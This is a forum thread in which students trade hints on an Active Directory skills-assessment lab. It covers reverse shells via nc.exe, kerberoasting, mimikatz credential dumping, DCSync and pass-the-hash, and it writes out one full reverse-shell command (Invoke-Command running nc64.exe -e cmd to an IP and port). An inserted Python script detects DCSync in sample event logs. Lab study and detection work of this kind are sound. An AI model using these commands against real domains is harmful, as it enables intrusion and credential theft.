Active Directory - Skills Assessment I

hey folks,

Looking for a nudge on the AD skills assessment I.

I’ve gotten all of the questions except for the last one - gaining a shell on the DC. Here’s what I’ve done so far:

  • used the web shell to get a more stable reverse shell with nc.exe
  • kerberoasted first user
  • used Enter-PSSession and nc.exe to gain a stable shell on the second box
  • used mimikatz to dump cached creds on the second box
  • obtained creds for second user with dcsync rights

The creds I’ve obtained are valid, but the user doesn’t have remoting rights. Things I’ve tried that don’t work:

  • psexec.exe from box1 and box2 to DC (unauthorized)
  • PSSession from box2 (unauthorized)
  • PTH from box2 using mimikatz (not working - I think it’s because it’s done through a reverse shell)
  • OPTH from box2 using mimikatz (not working, can’t turn the NTLM hash into a Kerberos ticket, or it’s not caching)
  • DCSync attack through mimikatz (not working from box2)

Things I haven’t tried yet:

  • secretsdump.exe
  • PTT

Looking for a nudge on what would be the right technique to gain access to the DC.

1 Like

I can’t get either of these to work on the second box. The Enter-PSSession works but gives me a very dysfunctional session. Can’t get nc.exe to run on the second box properly at all…

1 Like

What I usually do once I have the unstable shell with Enter-PSSession is I upload nc.exe to the first box, then download nc.exe onto the second box from the first box through that unstable shell, then pop a more solid shell through a different port from box2 to box1. Kind of a schlep, but it gets me through.

Couldn’t get that to work…had to use a different method…but I’m at the trying to DCSync the DC now… :exploding_head: :exploding_head: :exploding_head:

Hi, did you get any result? I’m at the same point, I can’t make that creepy shell work to download nc.exe.

what other method did you use? I think my methodology is kind of clunky here and I’m starting to overthink it / go in other directions not covered in the lessons…hmmmm

@sirius3000 @PaoloCMP I figured it out! send me a PM if you need a nudge. I was definitely overthinking it.

1 Like

I have to use a ScriptBlock like this: Invoke-Command -ComputerName box2 -Credential $cred -ScriptBlock {command}
Now trying to do a DCSync.
I put nc.exe and other files in uploads (web folder).
This way it was simpler to download and execute the reverse shell from box2 to box1.
Now it’s the DCSync part: secretsdump doesn’t give me the screen back in the shell to enter the password or follow the result.

How did you get the password of tp**** from second box?

sekurlsa::lnPassword fu

I receive a shell from box2 running Invoke-Command -ComputerName BOX2 -Credential $cred -ScriptBlock {.\nc64.exe -e cmd IP PORT}

I’m stuck in the DCSync attack, need a small hint

Got it. I have to impersonate user t**** to run the DCSync attack

PTH with /impersonate

I did dcsync, now I’m blocked with the hash. Tell me if you need a hint

I use Invoke-WMIExec to move with the hash to box03 (DC)
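The last few posts centre on the DCSync step (impersonating a user with replication rights, then pulling secrets from the DC). On the defensive side, that step shows up on the domain controller as Security event 4662 with the directory-replication extended rights requested by something other than a DC machine account. The following Python check is an added example, not from this thread or the lab: it runs over constructed 4662-style log lines in an assumed flattened key=value layout (real 4662 records carry the same GUIDs inside a longer Properties field), and the account names and the empty allow-list are assumptions.

```python
"""Flag 4662 events where a non-DC principal requested replication rights.

Added example (not the thread's or the lab's code). Log layout, account
names and the allow-list are assumptions; the sample lines are constructed.
"""
import re
from typing import Iterable, List, Optional

# Well-known extended-rights GUIDs that permit directory replication.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES: "DS-Replication-Get-Changes",
    DS_REPLICATION_GET_CHANGES_ALL: "DS-Replication-Get-Changes-All",
}

# Assumed allow-list of non-DC accounts that legitimately replicate
# (e.g. a directory-sync service account). Empty here on purpose.
ALLOWED_REPLICATORS = set()

# Assumed flattened record layout; adjust to whatever your SIEM emits.
EVENT_RE = re.compile(
    r"EventID=(?P<id>\d+)\s+SubjectUserName=(?P<user>\S+)\s+"
    r"ObjectType=(?P<otype>\S+)\s+Properties=(?P<props>\S*)"
)


def parse_event(line: str) -> Optional[dict]:
    """Parse one log line; return None for lines in another layout."""
    m = EVENT_RE.search(line)
    if not m:
        return None
    # Normalise GUIDs: strip braces and case so comparisons are exact.
    guids = {g.strip("{}").lower() for g in m.group("props").split(";") if g.strip()}
    return {
        "id": int(m.group("id")),
        "user": m.group("user"),
        "object_type": m.group("otype"),
        "guids": guids,
    }


def is_expected_replicator(user: str) -> bool:
    """DCs replicate with their machine account, whose name ends in '$'."""
    return user.endswith("$") or user.lower() in ALLOWED_REPLICATORS


def find_dcsync(lines: Iterable[str]) -> List[dict]:
    """Return one alert per 4662 event requesting replication rights from
    an unexpected principal, listing which rights were requested."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev["id"] != 4662:
            continue
        requested = ev["guids"] & set(REPLICATION_RIGHTS)
        if not requested or is_expected_replicator(ev["user"]):
            continue
        alerts.append({
            "user": ev["user"],
            "rights": sorted(REPLICATION_RIGHTS[g] for g in requested),
        })
    return alerts


# Constructed sample: a DC replicating normally, an ordinary user requesting
# both replication rights (the DCSync pattern), an unrelated 4662, and a 4624.
SAMPLE_4662_LOG = """
EventID=4662 SubjectUserName=DC01$ ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=lab_user ObjectType=domainDNS Properties={1131F6AA-9C07-11D1-F79F-00C04FC2DCD2};{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}
EventID=4662 SubjectUserName=alice ObjectType=user Properties={bf967aba-0de6-11d0-a285-00aa003049e2}
EventID=4624 SubjectUserName=alice ObjectType=- Properties=-
"""

if __name__ == "__main__":
    for alert in find_dcsync(SAMPLE_4662_LOG.splitlines()):
        print(f"possible DCSync by {alert['user']}: {', '.join(alert['rights'])}")
```

The check keys on the rights GUIDs rather than on tool names, so it fires regardless of whether mimikatz, secretsdump or anything else issued the replication request; tuning happens in `ALLOWED_REPLICATORS` and in the DC-machine-account rule, not in the GUID set.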

Hi All, I ran Mimikatz with sekurlsa::loXXXXX on second box but no cleartext password for THAT user.
Any guide for Question “Submit this user’s cleartext password.” ?

1 Like

Anyone for part two?

same here stuck on Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

already got C:\flag.txt on ms*1

I solved the question “Submit this user’s cleartext password.” now. Don’t know if this is the intended way to do it, but I needed to add a registry entry and restart the machine to get the plaintext password with Mimikatz “sekurlsa::loXXXXX FXXX”

Please find the below reference

I am using the A90 credentials on MS**.
I do not have admin permission to add the registry entry or restart the machine with this user :frowning:

Hi @binho1337, I’m still working on Skills-Assessment-I :rofl:
I think your question is Skills-Assessment-II?